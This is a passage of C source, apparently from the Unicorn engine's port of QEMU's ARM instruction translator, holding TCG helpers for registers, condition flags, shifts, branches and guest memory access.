ARMMMUIdx_MSUserNegPri: case ARMMMUIdx_MSPrivNegPri: return arm_to_core_mmu_idx(ARMMMUIdx_MSUserNegPri); default: g_assert_not_reached(); // never reach here return 0; } } static inline TCGv_i32 load_cpu_offset(TCGContext *tcg_ctx, int offset) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, offset); return tmp; } #define load_cpu_field(tcg_ctx, name) load_cpu_offset(tcg_ctx, offsetof(CPUARMState, name)) static inline void store_cpu_offset(TCGContext *tcg_ctx, TCGv_i32 var, int offset) { tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offset); tcg_temp_free_i32(tcg_ctx, var); } #define store_cpu_field(tcg_ctx, var, name) \ store_cpu_offset(tcg_ctx, var, offsetof(CPUARMState, name)) /* The architectural value of PC. */ static uint32_t read_pc(DisasContext *s) { return s->pc_curr + (s->thumb ? 4 : 8); } /* Set a variable to the value of a CPU register. */ static void load_reg_var(DisasContext *s, TCGv_i32 var, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (reg == 15) { tcg_gen_movi_i32(tcg_ctx, var, read_pc(s)); } else { tcg_gen_mov_i32(tcg_ctx, var, tcg_ctx->cpu_R[reg]); } } /* Create a new temporary and set it to the value of a CPU register. */ static inline TCGv_i32 load_reg(DisasContext *s, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); load_reg_var(s, tmp, reg); return tmp; } /* * Create a new temp, REG + OFS, except PC is ALIGN(PC, 4). * This is used for load/store for which use of PC implies (literal), * or ADD that implies ADR. */ static TCGv_i32 add_reg_for_lit(DisasContext *s, int reg, int ofs) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); if (reg == 15) { tcg_gen_movi_i32(tcg_ctx, tmp, (read_pc(s) & ~3) + ofs); } else { tcg_gen_addi_i32(tcg_ctx, tmp, tcg_ctx->cpu_R[reg], ofs); } return tmp; } /* Set a CPU register. The source must be a temporary and will be marked as dead. */ static void store_reg(DisasContext *s, int reg, TCGv_i32 var) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (reg == 15) { /* In Thumb mode, we must ignore bit 0. * In ARM mode, for ARMv4 and ARMv5, it is UNPREDICTABLE if bits [1:0] * are not 0b00, but for ARMv6 and above, we must ignore bits [1:0]. * We choose to ignore [1:0] in ARM mode for all architecture versions. */ tcg_gen_andi_i32(tcg_ctx, var, var, s->thumb ? ~1 : ~3); s->base.is_jmp = DISAS_JUMP; } tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_R[reg], var); tcg_temp_free_i32(tcg_ctx, var); } /* * Variant of store_reg which applies v8M stack-limit checks before updating * SP. If the check fails this will result in an exception being taken. * We disable the stack checks for CONFIG_USER_ONLY because we have * no idea what the stack limits should be in that case. * If stack checking is not being done this just acts like store_reg(). */ static void store_sp_checked(DisasContext *s, TCGv_i32 var) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->v8m_stackcheck) { gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, var); } store_reg(s, 13, var); } /* Value extensions. */ #define gen_uxtb(var) tcg_gen_ext8u_i32(tcg_ctx, var, var) #define gen_uxth(var) tcg_gen_ext16u_i32(tcg_ctx, var, var) #define gen_sxtb(var) tcg_gen_ext8s_i32(tcg_ctx, var, var) #define gen_sxth(var) tcg_gen_ext16s_i32(tcg_ctx, var, var) #define gen_sxtb16(var) gen_helper_sxtb16(tcg_ctx, var, var) #define gen_uxtb16(var) gen_helper_uxtb16(tcg_ctx, var, var) static inline void gen_set_cpsr(TCGContext *tcg_ctx, TCGv_i32 var, uint32_t mask) { TCGv_i32 tmp_mask = tcg_const_i32(tcg_ctx, mask); gen_helper_cpsr_write(tcg_ctx, tcg_ctx->cpu_env, var, tmp_mask); tcg_temp_free_i32(tcg_ctx, tmp_mask); } /* Set NZCV flags from the high 4 bits of var. */ #define gen_set_nzcv(var) gen_set_cpsr(tcg_ctx, var, CPSR_NZCV) static void gen_exception_internal(TCGContext *tcg_ctx, int excp) { TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); assert(excp_is_internal(excp)); gen_helper_exception_internal(tcg_ctx, tcg_ctx->cpu_env, tcg_excp); tcg_temp_free_i32(tcg_ctx, tcg_excp); } static void gen_step_complete_exception(DisasContext *s) { /* We just completed step of an insn. Move from Active-not-pending * to Active-pending, and then also take the swstep exception. * This corresponds to making the (IMPDEF) choice to prioritize * swstep exceptions over asynchronous exceptions taken to an exception * level where debug is disabled. This choice has the advantage that * we do not need to maintain internal state corresponding to the * ISV/EX syndrome bits between completion of the step and generation * of the exception, and our syndrome information is always correct. */ gen_ss_advance(s); gen_swstep_exception(s, 1, s->is_ldex); s->base.is_jmp = DISAS_NORETURN; } static void gen_singlestep_exception(DisasContext *s) { /* Generate the right kind of exception for singlestep, which is * either the architectural singlestep or EXCP_DEBUG for QEMU's * gdb singlestepping. */ TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->ss_active) { gen_step_complete_exception(s); } else { gen_exception_internal(tcg_ctx, EXCP_DEBUG); } } static inline bool is_singlestepping(DisasContext *s) { /* Return true if we are singlestepping either because of * architectural singlestep or QEMU gdbstub singlestep. This does * not include the command line '-singlestep' mode which is rather * misnamed as it only means "one instruction per TB" and doesn't * affect the code we generate. */ return s->base.singlestep_enabled || s->ss_active; } static void gen_smul_dual(TCGContext *tcg_ctx, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 tmp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext16s_i32(tcg_ctx, tmp1, a); tcg_gen_ext16s_i32(tcg_ctx, tmp2, b); tcg_gen_mul_i32(tcg_ctx, tmp1, tmp1, tmp2); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_gen_sari_i32(tcg_ctx, a, a, 16); tcg_gen_sari_i32(tcg_ctx, b, b, 16); tcg_gen_mul_i32(tcg_ctx, b, b, a); tcg_gen_mov_i32(tcg_ctx, a, tmp1); tcg_temp_free_i32(tcg_ctx, tmp1); } /* Byteswap each halfword. */ static void gen_rev16(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 var) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); TCGv_i32 mask = tcg_const_i32(tcg_ctx, 0x00ff00ff); tcg_gen_shri_i32(tcg_ctx, tmp, var, 8); tcg_gen_and_i32(tcg_ctx, tmp, tmp, mask); tcg_gen_and_i32(tcg_ctx, var, var, mask); tcg_gen_shli_i32(tcg_ctx, var, var, 8); tcg_gen_or_i32(tcg_ctx, dest, var, tmp); tcg_temp_free_i32(tcg_ctx, mask); tcg_temp_free_i32(tcg_ctx, tmp); } /* Byteswap low halfword and sign extend. */ static void gen_revsh(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 var) { tcg_gen_ext16u_i32(tcg_ctx, var, var); tcg_gen_bswap16_i32(tcg_ctx, var, var); tcg_gen_ext16s_i32(tcg_ctx, dest, var); } /* 32x32->64 multiply. Marks inputs as dead. */ static TCGv_i64 gen_mulu_i64_i32(TCGContext *tcg_ctx, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 lo = tcg_temp_new_i32(tcg_ctx); TCGv_i32 hi = tcg_temp_new_i32(tcg_ctx); TCGv_i64 ret; tcg_gen_mulu2_i32(tcg_ctx, lo, hi, a, b); tcg_temp_free_i32(tcg_ctx, a); tcg_temp_free_i32(tcg_ctx, b); ret = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, ret, lo, hi); tcg_temp_free_i32(tcg_ctx, lo); tcg_temp_free_i32(tcg_ctx, hi); return ret; } static TCGv_i64 gen_muls_i64_i32(TCGContext *tcg_ctx, TCGv_i32 a, TCGv_i32 b) { TCGv_i32 lo = tcg_temp_new_i32(tcg_ctx); TCGv_i32 hi = tcg_temp_new_i32(tcg_ctx); TCGv_i64 ret; tcg_gen_muls2_i32(tcg_ctx, lo, hi, a, b); tcg_temp_free_i32(tcg_ctx, a); tcg_temp_free_i32(tcg_ctx, b); ret = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_i32_i64(tcg_ctx, ret, lo, hi); tcg_temp_free_i32(tcg_ctx, lo); tcg_temp_free_i32(tcg_ctx, hi); return ret; } /* Swap low and high halfwords. */ static void gen_swap_half(TCGContext *tcg_ctx, TCGv_i32 var) { tcg_gen_rotri_i32(tcg_ctx, var, var, 16); } /* Dual 16-bit add. Result placed in t0 and t1 is marked as dead. tmp = (t0 ^ t1) & 0x8000; t0 &= ~0x8000; t1 &= ~0x8000; t0 = (t0 + t1) ^ tmp; */ static void gen_add16(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0x8000); tcg_gen_andi_i32(tcg_ctx, t0, t0, ~0x8000); tcg_gen_andi_i32(tcg_ctx, t1, t1, ~0x8000); tcg_gen_add_i32(tcg_ctx, t0, t0, t1); tcg_gen_xor_i32(tcg_ctx, dest, t0, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } /* Set N and Z flags from var. */ static inline void gen_logic_CC(TCGContext *tcg_ctx, TCGv_i32 var) { tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, var); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, var); } /* dest = T0 + T1 + CF. */ static void gen_add_carry(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { tcg_gen_add_i32(tcg_ctx, dest, t0, t1); tcg_gen_add_i32(tcg_ctx, dest, dest, tcg_ctx->cpu_CF); } /* dest = T0 - T1 + CF - 1. */ static void gen_sub_carry(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { tcg_gen_sub_i32(tcg_ctx, dest, t0, t1); tcg_gen_add_i32(tcg_ctx, dest, dest, tcg_ctx->cpu_CF); tcg_gen_subi_i32(tcg_ctx, dest, dest, 1); } /* dest = T0 + T1. Compute C, N, V and Z flags */ static void gen_add_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0, tmp, t1, tmp); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); } /* dest = T0 + T1 + CF. Compute C, N, V and Z flags */ static void gen_adc_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); if (TCG_TARGET_HAS_add2_i32) { tcg_gen_movi_i32(tcg_ctx, tmp, 0); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t0, tmp, tcg_ctx->cpu_CF, tmp); tcg_gen_add2_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, t1, tmp); } else { TCGv_i64 q0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 q1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, q0, t0); tcg_gen_extu_i32_i64(tcg_ctx, q1, t1); tcg_gen_add_i64(tcg_ctx, q0, q0, q1); tcg_gen_extu_i32_i64(tcg_ctx, q1, tcg_ctx->cpu_CF); tcg_gen_add_i64(tcg_ctx, q0, q0, q1); tcg_gen_extr_i64_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, q0); tcg_temp_free_i64(tcg_ctx, q0); tcg_temp_free_i64(tcg_ctx, q1); } tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); } /* dest = T0 - T1. Compute C, N, V and Z flags */ static void gen_sub_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp; tcg_gen_sub_i32(tcg_ctx, tcg_ctx->cpu_NF, t0, t1); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_CF, t0, t1); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF, t0); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, t0, t1); tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tcg_gen_mov_i32(tcg_ctx, dest, tcg_ctx->cpu_NF); } /* dest = T0 + ~T1 + CF. Compute C, N, V and Z flags */ static void gen_sbc_CC(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_not_i32(tcg_ctx, tmp, t1); gen_adc_CC(tcg_ctx, dest, t0, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } #define GEN_SHIFT(name) \ static void gen_##name(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) \ { \ TCGv_i32 tmp1, tmp2, tmp3; \ tmp1 = tcg_temp_new_i32(tcg_ctx); \ tcg_gen_andi_i32(tcg_ctx, tmp1, t1, 0xff); \ tmp2 = tcg_const_i32(tcg_ctx, 0); \ tmp3 = tcg_const_i32(tcg_ctx, 0x1f); \ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GTU, tmp2, tmp1, tmp3, tmp2, t0); \ tcg_temp_free_i32(tcg_ctx, tmp3); \ tcg_gen_andi_i32(tcg_ctx, tmp1, tmp1, 0x1f); \ tcg_gen_##name##_i32(tcg_ctx, dest, tmp2, tmp1); \ tcg_temp_free_i32(tcg_ctx, tmp2); \ tcg_temp_free_i32(tcg_ctx, tmp1); \ } GEN_SHIFT(shl) GEN_SHIFT(shr) #undef GEN_SHIFT static void gen_sar(TCGContext *tcg_ctx, TCGv_i32 dest, TCGv_i32 t0, TCGv_i32 t1) { TCGv_i32 tmp1, tmp2; tmp1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, tmp1, t1, 0xff); tmp2 = tcg_const_i32(tcg_ctx, 0x1f); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GTU, tmp1, tmp1, tmp2, tmp2, tmp1); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_gen_sar_i32(tcg_ctx, dest, t0, tmp1); tcg_temp_free_i32(tcg_ctx, tmp1); } static void shifter_out_im(TCGContext *tcg_ctx, TCGv_i32 var, int shift) { tcg_gen_extract_i32(tcg_ctx, tcg_ctx->cpu_CF, var, shift, 1); } /* Shift by immediate. Includes special handling for shift == 0. */ static inline void gen_arm_shift_im(TCGContext *tcg_ctx, TCGv_i32 var, int shiftop, int shift, int flags) { switch (shiftop) { case 0: /* LSL */ if (shift != 0) { if (flags) shifter_out_im(tcg_ctx, var, 32 - shift); tcg_gen_shli_i32(tcg_ctx, var, var, shift); } break; case 1: /* LSR */ if (shift == 0) { if (flags) { tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, var, 31); } tcg_gen_movi_i32(tcg_ctx, var, 0); } else { if (flags) shifter_out_im(tcg_ctx, var, shift - 1); tcg_gen_shri_i32(tcg_ctx, var, var, shift); } break; case 2: /* ASR */ if (shift == 0) shift = 32; if (flags) shifter_out_im(tcg_ctx, var, shift - 1); if (shift == 32) shift = 31; tcg_gen_sari_i32(tcg_ctx, var, var, shift); break; case 3: /* ROR/RRX */ if (shift != 0) { if (flags) shifter_out_im(tcg_ctx, var, shift - 1); tcg_gen_rotri_i32(tcg_ctx, var, var, shift); break; } else { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_shli_i32(tcg_ctx, tmp, tcg_ctx->cpu_CF, 31); if (flags) shifter_out_im(tcg_ctx, var, 0); tcg_gen_shri_i32(tcg_ctx, var, var, 1); tcg_gen_or_i32(tcg_ctx, var, var, tmp); tcg_temp_free_i32(tcg_ctx, tmp); } } }; static inline void gen_arm_shift_reg(TCGContext *tcg_ctx, TCGv_i32 var, int shiftop, TCGv_i32 shift, int flags) { if (flags) { switch (shiftop) { case 0: gen_helper_shl_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; case 1: gen_helper_shr_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; case 2: gen_helper_sar_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; case 3: gen_helper_ror_cc(tcg_ctx, var, tcg_ctx->cpu_env, var, shift); break; } } else { switch (shiftop) { case 0: gen_shl(tcg_ctx, var, var, shift); break; case 1: gen_shr(tcg_ctx, var, var, shift); break; case 2: gen_sar(tcg_ctx, var, var, shift); break; case 3: tcg_gen_andi_i32(tcg_ctx, shift, shift, 0x1f); tcg_gen_rotr_i32(tcg_ctx, var, var, shift); break; } } tcg_temp_free_i32(tcg_ctx, shift); } /* * Generate a conditional based on ARM condition code cc. * This is common between ARM and Aarch64 targets. */ void arm_test_cc(TCGContext *tcg_ctx, DisasCompare *cmp, int cc) { TCGv_i32 value; TCGCond cond; bool global = true; switch (cc) { case 0: /* eq: Z */ case 1: /* ne: !Z */ cond = TCG_COND_EQ; value = tcg_ctx->cpu_ZF; break; case 2: /* cs: C */ case 3: /* cc: !C */ cond = TCG_COND_NE; value = tcg_ctx->cpu_CF; break; case 4: /* mi: N */ case 5: /* pl: !N */ cond = TCG_COND_LT; value = tcg_ctx->cpu_NF; break; case 6: /* vs: V */ case 7: /* vc: !V */ cond = TCG_COND_LT; value = tcg_ctx->cpu_VF; break; case 8: /* hi: C && !Z */ case 9: /* ls: !C || Z -> !(C && !Z) */ cond = TCG_COND_NE; value = tcg_temp_new_i32(tcg_ctx); global = false; /* CF is 1 for C, so -CF is an all-bits-set mask for C; ZF is non-zero for !Z; so AND the two subexpressions. */ tcg_gen_neg_i32(tcg_ctx, value, tcg_ctx->cpu_CF); tcg_gen_and_i32(tcg_ctx, value, value, tcg_ctx->cpu_ZF); break; case 10: /* ge: N == V -> N ^ V == 0 */ case 11: /* lt: N != V -> N ^ V != 0 */ /* Since we're only interested in the sign bit, == 0 is >= 0. */ cond = TCG_COND_GE; value = tcg_temp_new_i32(tcg_ctx); global = false; tcg_gen_xor_i32(tcg_ctx, value, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); break; case 12: /* gt: !Z && N == V */ case 13: /* le: Z || N != V */ cond = TCG_COND_NE; value = tcg_temp_new_i32(tcg_ctx); global = false; /* (N == V) is equal to the sign bit of ~(NF ^ VF). Propagate * the sign bit then AND with ZF to yield the result. */ tcg_gen_xor_i32(tcg_ctx, value, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); tcg_gen_sari_i32(tcg_ctx, value, value, 31); tcg_gen_andc_i32(tcg_ctx, value, tcg_ctx->cpu_ZF, value); break; case 14: /* always */ case 15: /* always */ /* Use the ALWAYS condition, which will fold early. * It doesn't matter what we use for the value. */ cond = TCG_COND_ALWAYS; value = tcg_ctx->cpu_ZF; goto no_invert; default: fprintf(stderr, "Bad condition code 0x%x\n", cc); abort(); } if (cc & 1) { cond = tcg_invert_cond(cond); } no_invert: cmp->cond = cond; cmp->value = value; cmp->value_global = global; } void arm_free_cc(TCGContext *tcg_ctx, DisasCompare *cmp) { if (!cmp->value_global) { tcg_temp_free_i32(tcg_ctx, cmp->value); } } void arm_jump_cc(TCGContext *tcg_ctx, DisasCompare *cmp, TCGLabel *label) { tcg_gen_brcondi_i32(tcg_ctx, cmp->cond, cmp->value, 0, label); } void arm_gen_test_cc(TCGContext *tcg_ctx, int cc, TCGLabel *label) { DisasCompare cmp; arm_test_cc(tcg_ctx, &cmp, cc); arm_jump_cc(tcg_ctx, &cmp, label); arm_free_cc(tcg_ctx, &cmp); } static inline void gen_set_condexec(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->condexec_mask) { uint32_t val = (s->condexec_cond << 4) | (s->condexec_mask >> 1); TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, val); store_cpu_field(tcg_ctx, tmp, condexec_bits); } } static inline void gen_set_pc_im(DisasContext *s, target_ulong val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[15], val); } /* Set PC and Thumb state from var. var is marked as dead. */ static inline void gen_bx(DisasContext *s, TCGv_i32 var) { TCGContext *tcg_ctx = s->uc->tcg_ctx; s->base.is_jmp = DISAS_JUMP; tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_R[15], var, ~1); tcg_gen_andi_i32(tcg_ctx, var, var, 1); store_cpu_field(tcg_ctx, var, thumb); } /* * Set PC and Thumb state from var. var is marked as dead. * For M-profile CPUs, include logic to detect exception-return * branches and handle them. This is needed for Thumb POP/LDM to PC, LDR to PC, * and BX reg, and no others, and happens only for code in Handler mode. * The Security Extension also requires us to check for the FNC_RETURN * which signals a function return from non-secure state; this can happen * in both Handler and Thread mode. * To avoid having to do multiple comparisons in inline generated code, * we make the check we do here loose, so it will match for EXC_RETURN * in Thread mode. For system emulation do_v7m_exception_exit() checks * for these spurious cases and returns without doing anything (giving * the same behaviour as for a branch to a non-magic address). * * In linux-user mode it is unclear what the right behaviour for an * attempted FNC_RETURN should be, because in real hardware this will go * directly to Secure code (ie not the Linux kernel) which will then treat * the error in any way it chooses. For QEMU we opt to make the FNC_RETURN * attempt behave the way it would on a CPU without the security extension, * which is to say "like a normal branch". That means we can simply treat * all branches as normal with no magic address behaviour. */ static inline void gen_bx_excret(DisasContext *s, TCGv_i32 var) { /* Generate the same code here as for a simple bx, but flag via * s->base.is_jmp that we need to do the rest of the work later. */ gen_bx(s, var); if (arm_dc_feature(s, ARM_FEATURE_M_SECURITY) || (s->v7m_handler_mode && arm_dc_feature(s, ARM_FEATURE_M))) { s->base.is_jmp = DISAS_BX_EXCRET; } } static inline void gen_bx_excret_final_code(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Generate the code to finish possible exception return and end the TB */ TCGLabel *excret_label = gen_new_label(tcg_ctx); uint32_t min_magic; if (arm_dc_feature(s, ARM_FEATURE_M_SECURITY)) { /* Covers FNC_RETURN and EXC_RETURN magic */ min_magic = FNC_RETURN_MIN_MAGIC; } else { /* EXC_RETURN magic only */ min_magic = EXC_RETURN_MIN_MAGIC; } /* Is the new PC value in the magic range indicating exception return? */ tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_R[15], min_magic, excret_label); /* No: end the TB as we would for a DISAS_JMP */ if (is_singlestepping(s)) { gen_singlestep_exception(s); } else { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } gen_set_label(tcg_ctx, excret_label); /* Yes: this is an exception return. * At this point in runtime env->regs[15] and env->thumb will hold * the exception-return magic number, which do_v7m_exception_exit() * will read. Nothing else will be able to see those values because * the cpu-exec main loop guarantees that we will always go straight * from raising the exception to the exception-handling code. * * gen_ss_advance(s) does nothing on M profile currently but * calling it is conceptually the right thing as we have executed * this instruction (compare SWI, HVC, SMC handling). */ gen_ss_advance(s); gen_exception_internal(tcg_ctx, EXCP_EXCEPTION_EXIT); } static inline void gen_bxns(DisasContext *s, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 var = load_reg(s, rm); /* The bxns helper may raise an EXCEPTION_EXIT exception, so in theory * we need to sync state before calling it, but: * - we don't need to do gen_set_pc_im() because the bxns helper will * always set the PC itself * - we don't need to do gen_set_condexec() because BXNS is UNPREDICTABLE * unless it's outside an IT block or the last insn in an IT block, * so we know that condexec == 0 (already set at the top of the TB) * is correct in the non-UNPREDICTABLE cases, and we can choose * "zeroes the IT bits" as our UNPREDICTABLE behaviour otherwise. */ gen_helper_v7m_bxns(tcg_ctx, tcg_ctx->cpu_env, var); tcg_temp_free_i32(tcg_ctx, var); s->base.is_jmp = DISAS_EXIT; } static inline void gen_blxns(DisasContext *s, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 var = load_reg(s, rm); /* We don't need to sync condexec state, for the same reason as bxns. * We do however need to set the PC, because the blxns helper reads it. * The blxns helper may throw an exception. */ gen_set_pc_im(s, s->base.pc_next); gen_helper_v7m_blxns(tcg_ctx, tcg_ctx->cpu_env, var); tcg_temp_free_i32(tcg_ctx, var); s->base.is_jmp = DISAS_EXIT; } /* Variant of store_reg which uses branch&exchange logic when storing to r15 in ARM architecture v7 and above. The source must be a temporary and will be marked as dead. */ static inline void store_reg_bx(DisasContext *s, int reg, TCGv_i32 var) { if (reg == 15 && ENABLE_ARCH_7) { gen_bx(s, var); } else { store_reg(s, reg, var); } } /* Variant of store_reg which uses branch&exchange logic when storing * to r15 in ARM architecture v5T and above. This is used for storing * the results of a LDR/LDM/POP into r15, and corresponds to the cases * in the ARM ARM which use the LoadWritePC() pseudocode function. */ static inline void store_reg_from_load(DisasContext *s, int reg, TCGv_i32 var) { if (reg == 15 && ENABLE_ARCH_5) { gen_bx_excret(s, var); } else { store_reg(s, reg, var); } } #define IS_USER_ONLY 0 /* Abstractions of "generate code to do a guest load/store for * AArch32", where a vaddr is always 32 bits (and is zero * extended if we're a 64 bit core) and data is also * 32 bits unless specifically doing a 64 bit access. * These functions work like tcg_gen_qemu_{ld,st}* except * that the address argument is TCGv_i32 rather than TCGv. */ static inline TCGv gen_aa32_addr(DisasContext *s, TCGv_i32 a32, MemOp op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr = tcg_temp_new(tcg_ctx); tcg_gen_extu_i32_tl(tcg_ctx, addr, a32); /* Not needed for user-mode BE32, where we use MO_BE instead. */ // Unicorn: By default UC_MODE_BIG_MODE is BE32 mode, which in fact qemu-usermode. // Thus, we only do this in BE8 (qemu system) mode. if ( (s->uc->mode & UC_MODE_ARMBE8) && s->sctlr_b && (op & MO_SIZE) < MO_32) { tcg_gen_xori_tl(tcg_ctx, addr, addr, 4 - (1 << (op & MO_SIZE))); } return addr; } static void gen_aa32_ld_i32(DisasContext *s, TCGv_i32 val, TCGv_i32 a32, int index, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr; if (arm_dc_feature(s, ARM_FEATURE_M) && !arm_dc_feature(s, ARM_FEATURE_M_MAIN)) { opc |= MO_ALIGN; } addr = gen_aa32_addr(s, a32, opc); tcg_gen_qemu_ld_i32(tcg_ctx, val, addr, index, opc); tcg_temp_free(tcg_ctx, addr); } static void gen_aa32_st_i32(DisasContext *s, TCGv_i32 val, TCGv_i32 a32, int index, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr; if (arm_dc_feature(s, ARM_FEATURE_M) && !arm_dc_feature(s, ARM_FEATURE_M_MAIN)) { opc |= MO_ALIGN; } addr = gen_aa32_addr(s, a32, opc); tcg_gen_qemu_st_i32(tcg_ctx, val, addr, index, opc); tcg_temp_free(tcg_ctx, addr); } #define DO_GEN_LD(SUFF, OPC) \ static inline void gen_aa32_ld##SUFF(DisasContext *s, TCGv_i32 val, \ TCGv_i32 a32, int index) \ { \ gen_aa32_ld_i32(s, val, a32, index, OPC | s->be_data); \ } #define DO_GEN_ST(SUFF, OPC) \ static inline void gen_aa32_st##SUFF(DisasContext *s, TCGv_i32 val, \ TCGv_i32 a32, int index) \ { \ gen_aa32_st_i32(s, val, a32, index, OPC | s->be_data); \ } static inline void gen_aa32_frob64(DisasContext *s, TCGv_i64 val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Not needed for user-mode BE32, where we use MO_BE instead. */ // Unicorn: By default UC_MODE_BIG_MODE is BE32 mode, which in fact qemu-usermode. // Thus, we only do this in BE8 (qemu system) mode. if ( (s->uc->mode & UC_MODE_ARMBE8) && s->sctlr_b) { tcg_gen_rotri_i64(tcg_ctx, val, val, 32); } } static void gen_aa32_ld_i64(DisasContext *s, TCGv_i64 val, TCGv_i32 a32, int index, MemOp opc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv addr = gen_aa32_addr(s, a32, opc); tcg_gen_qemu_ld_i64(tcg_ctx, val, addr, index, opc); 